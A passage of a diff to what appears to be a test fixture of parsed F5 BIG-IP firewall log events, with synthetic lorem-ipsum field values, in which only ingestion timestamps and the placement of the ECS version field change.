device_vendor=idolo device_version=1.768 drop_reason=pitlabo errdefs_msgno=tas errdefs_msg_name=rcitat flow_id=ree ip_protocol=tcp severity=very-high partition_name=quipexea route_domain=orsitv sa_translation_pool=dunt sa_translation_type=int source_ip=10.53.27.253 src_geo=temveleu source_port=3599 source_user=luptat translated_dest_ip=10.75.113.240 translated_dest_port=1874 translated_ip_protocol=ionulam translated_route_domain=auto translated_source_ip=10.129.16.166 translated_source_port=5141 translated_vlan=ntocca vlan=5439", "event": { - "ingested": "2021-06-09T10:31:51.965460800Z" + "ingested": "2021-12-14T14:42:50.150099008Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tvol lup mipsamv161.local ionula pexeaco temaccu [F5@uamqua acl_policy_name=Neq acl_policy_type=runt acl_rule_name=xcep action=Established hostname=pteurs1031.mail.corp bigip_mgmt_ip=10.125.150.220 context_name=lumquid context_type=eturadip date_time=Mar 11 2018 02:28:49 dest_ip=10.241.228.95 dst_geo=equ dest_port=7256 device_product=ssequamn device_vendor=ave device_version=1.5812 drop_reason=edquia errdefs_msgno=ihi errdefs_msg_name=undeomn flow_id=ape ip_protocol=rdp severity=medium partition_name=ari route_domain=umtot sa_translation_pool=onemulla sa_translation_type=atquo source_ip=10.120.50.13 src_geo=issu source_port=4426 source_user=inculpa translated_dest_ip=10.150.153.61 translated_dest_port=2773 translated_ip_protocol=loremagn translated_route_domain=acons translated_source_ip=10.22.213.196 translated_source_port=7230 translated_vlan=emoenimi vlan=1864", "event": { - "ingested": "2021-06-09T10:31:51.965465500Z" + "ingested": "2021-12-14T14:42:50.150099393Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mqu onorume abill5290.lan mini mve tionev [F5@uasiarch acl_policy_name=velites acl_policy_type=uredolor 
acl_rule_name=epreh action=Accept hostname=edquiaco6562.api.lan bigip_mgmt_ip=10.113.2.13 context_name=rudexerc context_type=nturm date_time=Mar 25 2018 09:31:24 dest_ip=10.182.134.109 dst_geo=dquia dest_port=5334 device_product=bori device_vendor=dipi device_version=1.7232 drop_reason=utf errdefs_msgno=dolor errdefs_msg_name=dexe flow_id=nemul ip_protocol=igmp severity=low partition_name=lupt route_domain=quatur sa_translation_pool=dminim sa_translation_type=ptatevel source_ip=10.85.52.249 src_geo=eirured source_port=3772 source_user=tatiset translated_dest_ip=10.238.171.184 translated_dest_port=2574 translated_ip_protocol=duntutl translated_route_domain=nven translated_source_ip=10.229.155.171 translated_source_port=6978 translated_vlan=asiarch vlan=7121", "event": { - "ingested": "2021-06-09T10:31:51.965470400Z" + "ingested": "2021-12-14T14:42:50.150099779Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "utla deomni tse7542.test nesciu todit utaliqui [F5@emse acl_policy_name=emqui acl_policy_type=cipitla acl_rule_name=tlab action=Accept hostname=tatis7315.mail.home bigip_mgmt_ip=10.249.174.35 context_name=umfu context_type=utla date_time=Apr 08 2018 16:33:58 dest_ip=10.136.53.201 dst_geo=dolo dest_port=6418 device_product=samvol device_vendor=equa device_version=1.536 drop_reason=strumex errdefs_msgno=tessecil errdefs_msg_name=ugia flow_id=reprehe ip_protocol=udp severity=medium partition_name=umq route_domain=sistena sa_translation_pool=qui sa_translation_type=caboN source_ip=10.198.150.185 src_geo=catcupid source_port=3167 source_user=quela translated_dest_ip=10.51.245.225 translated_dest_port=3991 translated_ip_protocol=enimi translated_route_domain=illum translated_source_ip=10.220.1.249 translated_source_port=4200 translated_vlan=Sedut vlan=7832", "event": { - "ingested": "2021-06-09T10:31:51.965475300Z" + "ingested": "2021-12-14T14:42:50.150100178Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "audant obeata uredol2348.www5.host entorev quuntur olup [F5@aeab acl_policy_name=uradipis acl_policy_type=aerat acl_rule_name=les action=Drop hostname=eosqui3723.api.localdomain bigip_mgmt_ip=10.152.157.32 context_name=ali context_type=udexerci date_time=Apr 22 2018 23:36:32 dest_ip=10.76.232.245 dst_geo=osqu dest_port=4859 device_product=aborio device_vendor=rve device_version=1.219 drop_reason=nbyCi errdefs_msgno=runtmoll errdefs_msg_name=busBon flow_id=norumetM ip_protocol=udp severity=low partition_name=usBono route_domain=ameaq sa_translation_pool=Quis sa_translation_type=lupta source_ip=10.251.82.195 src_geo=umiure source_port=5186 source_user=olorese translated_dest_ip=10.190.96.181 translated_dest_port=2153 translated_ip_protocol=culp translated_route_domain=deomn translated_source_ip=10.38.185.31 translated_source_port=1085 translated_vlan=llo vlan=1106", "event": { - "ingested": "2021-06-09T10:31:51.965480300Z" + "ingested": "2021-12-14T14:42:50.150100563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tla iaconseq sed3235.www5.localhost pidatatn isno luptatev [F5@occaeca acl_policy_name=dan acl_policy_type=pta acl_rule_name=upt action=Drop hostname=itaedict199.mail.corp bigip_mgmt_ip=10.103.102.242 context_name=labore context_type=lorem date_time=May 07 2018 06:39:06 dest_ip=10.68.159.207 dst_geo=eratv dest_port=7206 device_product=estq device_vendor=quasiarc device_version=1.6526 drop_reason=liq errdefs_msgno=xerc errdefs_msg_name=atisetqu flow_id=squir ip_protocol=icmp severity=very-high partition_name=quam route_domain=deriti sa_translation_pool=edictasu sa_translation_type=eturadi source_ip=10.190.247.194 src_geo=mSecti source_port=4210 source_user=tDuisaut translated_dest_ip=10.230.112.179 translated_dest_port=5926 translated_ip_protocol=vol 
translated_route_domain=ita translated_source_ip=10.211.198.50 translated_source_port=7510 translated_vlan=nibusB vlan=5555", "event": { - "ingested": "2021-06-09T10:31:51.965485100Z" + "ingested": "2021-12-14T14:42:50.150100955Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amremap oremagna aqu4475.mail.invalid serrorsi tsedquia rsit [F5@quis acl_policy_name=upidatat acl_policy_type=mod acl_rule_name=niamqui action=Closed hostname=xeaco7887.www.localdomain bigip_mgmt_ip=10.47.223.155 context_name=ugitsed context_type=dminimve date_time=May 21 2018 13:41:41 dest_ip=10.111.137.84 dst_geo=uiac dest_port=7838 device_product=tot device_vendor=reme device_version=1.7750 drop_reason=loremi errdefs_msgno=queporro errdefs_msg_name=tur flow_id=eFi ip_protocol=ipv6-icmp severity=medium partition_name=ulapari route_domain=eporroq sa_translation_pool=uunturm sa_translation_type=iatn source_ip=10.219.83.199 src_geo=diduntut source_port=1321 source_user=ectetur translated_dest_ip=10.101.13.122 translated_dest_port=6737 translated_ip_protocol=nibusBo translated_route_domain=volup translated_source_ip=10.251.101.61 translated_source_port=5153 translated_vlan=scipit vlan=6495", "event": { - "ingested": "2021-06-09T10:31:51.965490600Z" + "ingested": "2021-12-14T14:42:50.150101346Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tore isni tamrema736.www5.lan ntiumdol conse aturve [F5@edqui acl_policy_name=tvolu acl_policy_type=psu acl_rule_name=strud action=Closed hostname=saute7421.www.invalid bigip_mgmt_ip=10.21.80.157 context_name=tiumtot context_type=tate date_time=Jun 04 2018 20:44:15 dest_ip=10.13.222.177 dst_geo=inBCSed dest_port=6353 device_product=Loremip device_vendor=taliqui device_version=1.5568 drop_reason=ipsaquae errdefs_msgno=olu errdefs_msg_name=exerci flow_id=isnostru ip_protocol=tcp 
severity=very-high partition_name=ngelits route_domain=volupt sa_translation_pool=billoi sa_translation_type=reseo source_ip=10.31.86.83 src_geo=pariat source_port=6646 source_user=litsed translated_dest_ip=10.21.30.43 translated_dest_port=4754 translated_ip_protocol=lorem translated_route_domain=iamquisn translated_source_ip=10.83.136.233 translated_source_port=6643 translated_vlan=imadm vlan=3187", "event": { - "ingested": "2021-06-09T10:31:51.965495600Z" + "ingested": "2021-12-14T14:42:50.150101728Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lumdol edutper utemve6966.mail.local emoen ptate mipsumqu [F5@turad acl_policy_name=dol acl_policy_type=ntutla acl_rule_name=des action=Accept hostname=oluptas1637.home bigip_mgmt_ip=10.195.90.73 context_name=ipisc context_type=iatnulap date_time=Jun 19 2018 03:46:49 dest_ip=10.170.155.137 dst_geo=uine dest_port=1815 device_product=veniamqu device_vendor=iconsequ device_version=1.5445 drop_reason=apa errdefs_msgno=archite errdefs_msg_name=tur flow_id=ddo ip_protocol=ipv6 severity=high partition_name=inBC route_domain=did sa_translation_pool=atcupi sa_translation_type=eriti source_ip=10.45.152.205 src_geo=rema source_port=5107 source_user=datatn translated_dest_ip=10.194.197.107 translated_dest_port=2524 translated_ip_protocol=tur translated_route_domain=itation translated_source_ip=10.27.181.27 translated_source_port=5509 translated_vlan=uredo vlan=2155", "event": { - "ingested": "2021-06-09T10:31:51.965500500Z" + "ingested": "2021-12-14T14:42:50.150102115Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "use catcu quame922.internal.host eursi liquid ulapari [F5@ibus acl_policy_name=isu acl_policy_type=moll acl_rule_name=roinBCS action=Drop hostname=ididu5505.api.localdomain bigip_mgmt_ip=10.43.239.97 context_name=modi context_type=cip date_time=Jul 
03 2018 10:49:23 dest_ip=10.60.60.164 dst_geo=iscive dest_port=5527 device_product=incididu device_vendor=yCice device_version=1.508 drop_reason=ionem errdefs_msgno=taevitae errdefs_msg_name=dminimv flow_id=quam ip_protocol=tcp severity=low partition_name=umdol route_domain=rerepr sa_translation_pool=ipiscin sa_translation_type=trudexe source_ip=10.222.2.132 src_geo=umdo source_port=6187 source_user=aedicta translated_dest_ip=10.129.161.18 translated_dest_port=782 translated_ip_protocol=umquiad translated_route_domain=porinc translated_source_ip=10.183.90.25 translated_source_port=5038 translated_vlan=conse vlan=2563", "event": { - "ingested": "2021-06-09T10:31:51.965505500Z" + "ingested": "2021-12-14T14:42:50.150102507Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dolo reeufu umexe5208.local suntex uptatema uteiru [F5@rcitati acl_policy_name=siutali acl_policy_type=uiratio acl_rule_name=ficia action=Closed hostname=mqui1099.api.corp bigip_mgmt_ip=10.231.167.171 context_name=onorumet context_type=illoinve date_time=Jul 17 2018 17:51:58 dest_ip=10.188.254.168 dst_geo=nevolup dest_port=3706 device_product=lor device_vendor=ica device_version=1.4479 drop_reason=sumd errdefs_msgno=elitse errdefs_msg_name=olu flow_id=temqu ip_protocol=rdp severity=very-high partition_name=nesci route_domain=meaquei sa_translation_pool=snisiu sa_translation_type=atem source_ip=10.189.162.131 src_geo=litsed source_port=6019 source_user=sedquia translated_dest_ip=10.67.129.100 translated_dest_port=7106 translated_ip_protocol=mmodicon translated_route_domain=eosquir translated_source_ip=10.248.156.138 translated_source_port=2125 translated_vlan=smodit vlan=3090", "event": { - "ingested": "2021-06-09T10:31:51.965510300Z" + "ingested": "2021-12-14T14:42:50.150102900Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dun 
xce dol5403.www.localhost asiar eiu maliquam [F5@gnama acl_policy_name=ursintoc acl_policy_type=minimve acl_rule_name=eprehe action=Reject hostname=siuta2155.lan bigip_mgmt_ip=10.63.103.30 context_name=ill context_type=imveniam date_time=Aug 01 2018 00:54:32 dest_ip=10.36.29.127 dst_geo=umqui dest_port=1757 device_product=sci device_vendor=isquames device_version=1.2927 drop_reason=tlabor errdefs_msgno=itecto errdefs_msg_name=loreeuf flow_id=orainci ip_protocol=icmp severity=low partition_name=aev route_domain=uelaudan sa_translation_pool=lab sa_translation_type=sequa source_ip=10.6.146.184 src_geo=rrorsi source_port=7247 source_user=sequu translated_dest_ip=10.185.107.27 translated_dest_port=2257 translated_ip_protocol=mips translated_route_domain=iduntutl translated_source_ip=10.142.106.66 translated_source_port=3790 translated_vlan=quelauda vlan=289", "event": { - "ingested": "2021-06-09T10:31:51.965515300Z" + "ingested": "2021-12-14T14:42:50.150103301Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dolo ulamc doe344.www5.local toreve squirat llum [F5@dol acl_policy_name=niam acl_policy_type=atio acl_rule_name=sno action=Established hostname=tatiset4191.localdomain bigip_mgmt_ip=10.214.93.200 context_name=dtempor context_type=rroquisq date_time=Aug 15 2018 07:57:06 dest_ip=10.215.63.248 dst_geo=uidex dest_port=1203 device_product=lloi device_vendor=nseq device_version=1.4023 drop_reason=isetqua errdefs_msgno=ianonn errdefs_msg_name=oluptas flow_id=doe ip_protocol=udp severity=very-high partition_name=rchitect route_domain=orsitame sa_translation_pool=tasn sa_translation_type=exeaco source_ip=10.93.39.237 src_geo=aincidu source_port=232 source_user=tionofd translated_dest_ip=10.0.202.9 translated_dest_port=7451 translated_ip_protocol=nvolup translated_route_domain=ommodic translated_source_ip=10.119.179.182 translated_source_port=7255 translated_vlan=undeo vlan=7696", "event": 
{ - "ingested": "2021-06-09T10:31:51.965520200Z" + "ingested": "2021-12-14T14:42:50.150104134Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uiinea uianonn eavolupt784.www5.example liquam sinto edi [F5@eumiure acl_policy_name=ore acl_policy_type=adeser acl_rule_name=mSe action=Drop hostname=aute2433.mail.lan bigip_mgmt_ip=10.252.204.162 context_name=tiae context_type=giat date_time=Aug 29 2018 14:59:40 dest_ip=10.115.77.51 dst_geo=mcorpor dest_port=2433 device_product=ostru device_vendor=mea device_version=1.5939 drop_reason=iquipex errdefs_msgno=byCice errdefs_msg_name=deritq flow_id=boreetdo ip_protocol=ipv6-icmp severity=medium partition_name=iin route_domain=nostr sa_translation_pool=luptatem sa_translation_type=tNequepo source_ip=10.28.145.163 src_geo=sper source_port=72 source_user=imadmin translated_dest_ip=10.123.154.140 translated_dest_port=2551 translated_ip_protocol=mSect translated_route_domain=iure translated_source_ip=10.30.189.166 translated_source_port=2749 translated_vlan=aer vlan=3422", "event": { - "ingested": "2021-06-09T10:31:51.965525Z" + "ingested": "2021-12-14T14:42:50.150104630Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "roquis mremape ude2977.www.corp rmagnido exeaco dqu [F5@ccaec acl_policy_name=repreh acl_policy_type=imven acl_rule_name=usan action=Accept hostname=idolo6535.internal.example bigip_mgmt_ip=10.46.162.198 context_name=snulap context_type=onsequat date_time=Sep 12 2018 22:02:15 dest_ip=10.166.128.248 dst_geo=pariatur dest_port=7435 device_product=tura device_vendor=equuntur device_version=1.6564 drop_reason=uaera errdefs_msgno=mqua errdefs_msg_name=xer flow_id=utlabore ip_protocol=ipv6-icmp severity=very-high partition_name=beataevi route_domain=amquisn sa_translation_pool=itquii sa_translation_type=imaven source_ip=10.145.128.250 src_geo=nder 
source_port=5641 source_user=eni translated_dest_ip=10.79.49.3 translated_dest_port=7794 translated_ip_protocol=psamvolu translated_route_domain=teturad translated_source_ip=10.29.122.183 translated_source_port=6166 translated_vlan=tla vlan=6146", "event": { - "ingested": "2021-06-09T10:31:51.965530300Z" + "ingested": "2021-12-14T14:42:50.150105047Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "modtempo edict nost3250.internal.localdomain nibu quatur isiutali [F5@mdolo acl_policy_name=nof acl_policy_type=usantiu acl_rule_name=periam action=Closed hostname=one7728.api.localdomain bigip_mgmt_ip=10.177.232.136 context_name=obe context_type=niamqu date_time=Sep 27 2018 05:04:49 dest_ip=10.140.59.161 dst_geo=smoditem dest_port=575 device_product=tev device_vendor=oNemoeni device_version=1.3341 drop_reason=elillumq errdefs_msgno=loremeum errdefs_msg_name=luptatem flow_id=ing ip_protocol=tcp severity=very-high partition_name=riameaqu route_domain=etd sa_translation_pool=omnisi sa_translation_type=dolor source_ip=10.166.169.167 src_geo=ati source_port=1544 source_user=olors translated_dest_ip=10.65.174.196 translated_dest_port=472 translated_ip_protocol=iin translated_route_domain=uteiru translated_source_ip=10.142.235.217 translated_source_port=5846 translated_vlan=orain vlan=2663", "event": { - "ingested": "2021-06-09T10:31:51.965535100Z" + "ingested": "2021-12-14T14:42:50.150105437Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "llu quaUt labor7147.internal.host ten vitae tse [F5@gni acl_policy_name=per acl_policy_type=tione acl_rule_name=nibus action=Established hostname=uptatem4446.internal.localhost bigip_mgmt_ip=10.29.217.44 context_name=eacommod context_type=tali date_time=Oct 11 2018 12:07:23 dest_ip=10.131.223.198 dst_geo=orisnisi dest_port=4342 device_product=eritquii 
device_vendor=atevelit device_version=1.325 drop_reason=enat errdefs_msgno=ionula errdefs_msg_name=itaed flow_id=invol ip_protocol=rdp severity=low partition_name=cidun route_domain=tassitas sa_translation_pool=nimadmi sa_translation_type=dipisci source_ip=10.215.184.154 src_geo=nor source_port=3306 source_user=iarc translated_dest_ip=10.191.78.86 translated_dest_port=6355 translated_ip_protocol=uiac translated_route_domain=squ translated_source_ip=10.53.188.140 translated_source_port=6455 translated_vlan=ten vlan=2937", "event": { - "ingested": "2021-06-09T10:31:51.965540Z" + "ingested": "2021-12-14T14:42:50.150105919Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "isciveli ntutlab sitamet452.domain nsequ ing ollita [F5@dipisci acl_policy_name=amnisiu acl_policy_type=ptat acl_rule_name=epr action=Drop hostname=emq2514.api.localhost bigip_mgmt_ip=10.135.77.156 context_name=uraut context_type=non date_time=Oct 25 2018 19:09:57 dest_ip=10.248.182.188 dst_geo=turad dest_port=2537 device_product=nBCSe device_vendor=ollita device_version=1.3567 drop_reason=eni errdefs_msgno=quipe errdefs_msg_name=oluptat flow_id=stenatus ip_protocol=ggp severity=very-high partition_name=iaecon route_domain=ect sa_translation_pool=tquid sa_translation_type=seru source_ip=10.76.148.147 src_geo=remagna source_port=1121 source_user=urve translated_dest_ip=10.46.222.149 translated_dest_port=3304 translated_ip_protocol=squ translated_route_domain=emagnaal translated_source_ip=10.74.74.129 translated_source_port=5904 translated_vlan=itati vlan=3497", "event": { - "ingested": "2021-06-09T10:31:51.965545200Z" + "ingested": "2021-12-14T14:42:50.150106347Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rinc tno meumf4052.invalid pitlabo riamea Malorumw [F5@consect acl_policy_name=issu acl_policy_type=tconsect 
acl_rule_name=tationem action=Drop hostname=agna5654.www.corp bigip_mgmt_ip=10.96.200.223 context_name=iatisun context_type=cto date_time=Nov 09 2018 02:12:32 dest_ip=10.3.228.220 dst_geo=imadmini dest_port=3791 device_product=oeiusm device_vendor=aUtenim device_version=1.1186 drop_reason=isu errdefs_msgno=ute errdefs_msg_name=tdolore flow_id=madminim ip_protocol=igmp severity=very-high partition_name=prehen route_domain=ate sa_translation_pool=ull sa_translation_type=enimipsa source_ip=10.130.203.37 src_geo=quisnos source_port=2132 source_user=mvele translated_dest_ip=10.11.146.253 translated_dest_port=3581 translated_ip_protocol=remeum translated_route_domain=temseq translated_source_ip=10.145.49.29 translated_source_port=2464 translated_vlan=sedquia vlan=4912", "event": { - "ingested": "2021-06-09T10:31:51.965549900Z" + "ingested": "2021-12-14T14:42:50.150106778Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntmo aliqu iqu4429.www5.lan doconse volupta ptat [F5@oreverit acl_policy_name=nimides acl_policy_type=remipsum acl_rule_name=elit action=Drop hostname=ipi4827.mail.lan bigip_mgmt_ip=10.162.78.48 context_name=lab context_type=sedqui date_time=Nov 23 2018 09:15:06 dest_ip=10.243.157.94 dst_geo=epteu dest_port=5744 device_product=tura device_vendor=mquiavol device_version=1.6845 drop_reason=eabil errdefs_msgno=ibusB errdefs_msg_name=rporis flow_id=etco ip_protocol=ipv6 severity=very-high partition_name=ereprehe route_domain=olu sa_translation_pool=nofdeF sa_translation_type=riaturEx source_ip=10.24.23.209 src_geo=itautfu source_port=1503 source_user=rumwr translated_dest_ip=10.162.2.180 translated_dest_port=3889 translated_ip_protocol=mporain translated_route_domain=ectetur translated_source_ip=10.48.75.140 translated_source_port=1837 translated_vlan=ineavol vlan=5182", "event": { - "ingested": "2021-06-09T10:31:51.965554400Z" + "ingested": "2021-12-14T14:42:50.150107232Z" 
+ }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "onproid sitv equam3114.test mcorp uelaud aperiam [F5@ngelit acl_policy_name=quiano acl_policy_type=sund acl_rule_name=iaconse action=Drop hostname=sequatD163.internal.example bigip_mgmt_ip=10.151.206.38 context_name=oloremi context_type=luptate date_time=Dec 07 2018 16:17:40 dest_ip=10.38.57.217 dst_geo=rur dest_port=5543 device_product=imidest device_vendor=oeiusmod device_version=1.419 drop_reason=psumqui errdefs_msgno=eddoeiu errdefs_msg_name=oinvento flow_id=mips ip_protocol=udp severity=medium partition_name=corpor route_domain=amvolu sa_translation_pool=ent sa_translation_type=ionemu source_ip=10.66.92.83 src_geo=orinrep source_port=2549 source_user=nproide translated_dest_ip=10.119.12.186 translated_dest_port=5674 translated_ip_protocol=qui translated_route_domain=nemullam translated_source_ip=10.97.105.115 translated_source_port=3576 translated_vlan=squir vlan=3987", "event": { - "ingested": "2021-06-09T10:31:51.965558900Z" + "ingested": "2021-12-14T14:42:50.150107625Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umqu umet psaquaea5284.internal.example upt giatquo toccaec [F5@nihilmo acl_policy_name=atquo acl_policy_type=umetMa acl_rule_name=ngelitse action=Accept hostname=itamet1303.invalid bigip_mgmt_ip=10.12.148.73 context_name=eius context_type=evo date_time=Dec 21 2018 23:20:14 dest_ip=10.10.44.34 dst_geo=volupt dest_port=61 device_product=eosqu device_vendor=reetdolo device_version=1.7551 drop_reason=sten errdefs_msgno=enderi errdefs_msg_name=labore flow_id=uasiarch ip_protocol=igmp severity=very-high partition_name=magnama route_domain=reprehe sa_translation_pool=citatio sa_translation_type=dolo source_ip=10.201.132.114 src_geo=eetd source_port=6058 source_user=borisnis translated_dest_ip=10.64.76.142 translated_dest_port=7083 
translated_ip_protocol=temse translated_route_domain=samvo translated_source_ip=10.169.139.250 translated_source_port=1374 translated_vlan=nostrume vlan=5035", "event": { - "ingested": "2021-06-09T10:31:51.965564600Z" + "ingested": "2021-12-14T14:42:50.150108164Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tatevel itin tam942.api.host iut leumiur deser [F5@boris acl_policy_name=ris acl_policy_type=nisiuta acl_rule_name=utper action=Drop hostname=epr3512.internal.domain bigip_mgmt_ip=10.9.236.18 context_name=iumdo context_type=exe date_time=Jan 05 2019 06:22:49 dest_ip=10.152.7.48 dst_geo=giatnula dest_port=71 device_product=enimadmi device_vendor=qui device_version=1.5292 drop_reason=aecon errdefs_msgno=sedq errdefs_msg_name=olo flow_id=sperna ip_protocol=udp severity=very-high partition_name=conseq route_domain=upta sa_translation_pool=eturadi sa_translation_type=cinge source_ip=10.111.128.11 src_geo=niamq source_port=5336 source_user=umfug translated_dest_ip=10.35.38.185 translated_dest_port=7077 translated_ip_protocol=labor translated_route_domain=Sec translated_source_ip=10.200.116.191 translated_source_port=3068 translated_vlan=nsecte vlan=5790", "event": { - "ingested": "2021-06-09T10:31:51.965569800Z" + "ingested": "2021-12-14T14:42:50.150108562Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uianonnu por nve894.lan turadip ataev eFinib [F5@atione acl_policy_name=xcepte acl_policy_type=gnaa acl_rule_name=tio action=Reject hostname=uredol2174.home bigip_mgmt_ip=10.191.27.182 context_name=tMalo context_type=urautod date_time=Jan 19 2019 13:25:23 dest_ip=10.114.60.159 dst_geo=rese dest_port=5302 device_product=rissusci device_vendor=quaturve device_version=1.5991 drop_reason=tisunde errdefs_msgno=ende errdefs_msg_name=quidolor flow_id=lloin ip_protocol=igmp severity=high 
partition_name=proiden route_domain=moenimip sa_translation_pool=tat sa_translation_type=tate source_ip=10.236.67.227 src_geo=ern source_port=881 source_user=tlabo translated_dest_ip=10.134.238.8 translated_dest_port=2976 translated_ip_protocol=aqua translated_route_domain=edquiac translated_source_ip=10.240.62.238 translated_source_port=1251 translated_vlan=olo vlan=5926", "event": { - "ingested": "2021-06-09T10:31:51.965574800Z" + "ingested": "2021-12-14T14:42:50.150108949Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ali Nequepor aUten4127.internal.lan apariatu mnisis onsequa [F5@sunt acl_policy_name=orumSe acl_policy_type=olupta acl_rule_name=emveleum action=Drop hostname=ididunt7607.mail.localhost bigip_mgmt_ip=10.165.66.92 context_name=isq context_type=eacommo date_time=Feb 02 2019 20:27:57 dest_ip=10.244.171.198 dst_geo=nimad dest_port=7814 device_product=asi device_vendor=tobe device_version=1.6837 drop_reason=Lore errdefs_msgno=oin errdefs_msg_name=eritquii flow_id=taliqui ip_protocol=ipv6-icmp severity=very-high partition_name=entoreve route_domain=ion sa_translation_pool=exeaco sa_translation_type=tate source_ip=10.109.14.142 src_geo=sitas source_port=6036 source_user=perna translated_dest_ip=10.65.35.64 translated_dest_port=2748 translated_ip_protocol=irur translated_route_domain=risnisiu translated_source_ip=10.22.231.91 translated_source_port=2652 translated_vlan=equepor vlan=897", "event": { - "ingested": "2021-06-09T10:31:51.965579600Z" + "ingested": "2021-12-14T14:42:50.150109330Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ugiatn utpe hend1170.www5.lan ptateve aliqua officiad [F5@nimadmin acl_policy_name=iavol acl_policy_type=roq acl_rule_name=iumtota action=Reject hostname=inimav5557.www5.test bigip_mgmt_ip=10.71.112.86 context_name=olor context_type=emoenim 
date_time=Feb 17 2019 03:30:32 dest_ip=10.57.64.102 dst_geo=rume dest_port=7667 device_product=inibusBo device_vendor=tqui device_version=1.99 drop_reason=citat errdefs_msgno=prehende errdefs_msg_name=vitaedic flow_id=remip ip_protocol=ggp severity=high partition_name=rehe route_domain=aper sa_translation_pool=gnaa sa_translation_type=tam source_ip=10.64.161.215 src_geo=modi source_port=4869 source_user=rnatur translated_dest_ip=10.29.230.203 translated_dest_port=6579 translated_ip_protocol=abi translated_route_domain=inimaven translated_source_ip=10.89.221.90 translated_source_port=5835 translated_vlan=entoreve vlan=4612", "event": { - "ingested": "2021-06-09T10:31:51.965584600Z" + "ingested": "2021-12-14T14:42:50.150109722Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "roqu dquia ommod142.www.home ptate oloreeu imipsa [F5@iscinge acl_policy_name=ora acl_policy_type=meumfug acl_rule_name=inimve action=Closed hostname=nonn1650.www.test bigip_mgmt_ip=10.88.226.76 context_name=ptas context_type=iadolo date_time=Mar 03 2019 10:33:06 dest_ip=10.217.197.29 dst_geo=aliquide dest_port=7187 device_product=tinv device_vendor=iar device_version=1.5232 drop_reason=mquela errdefs_msgno=urm errdefs_msg_name=con flow_id=aeabil ip_protocol=udp severity=low partition_name=edicta route_domain=itaspern sa_translation_pool=tau sa_translation_type=rcit source_ip=10.79.208.135 src_geo=rehende source_port=3688 source_user=erspic translated_dest_ip=10.221.199.137 translated_dest_port=6430 translated_ip_protocol=quipe translated_route_domain=evita translated_source_ip=10.140.118.182 translated_source_port=4566 translated_vlan=nia vlan=7548", "event": { - "ingested": "2021-06-09T10:31:51.965589600Z" + "ingested": "2021-12-14T14:42:50.150110131Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "npro boriosa 
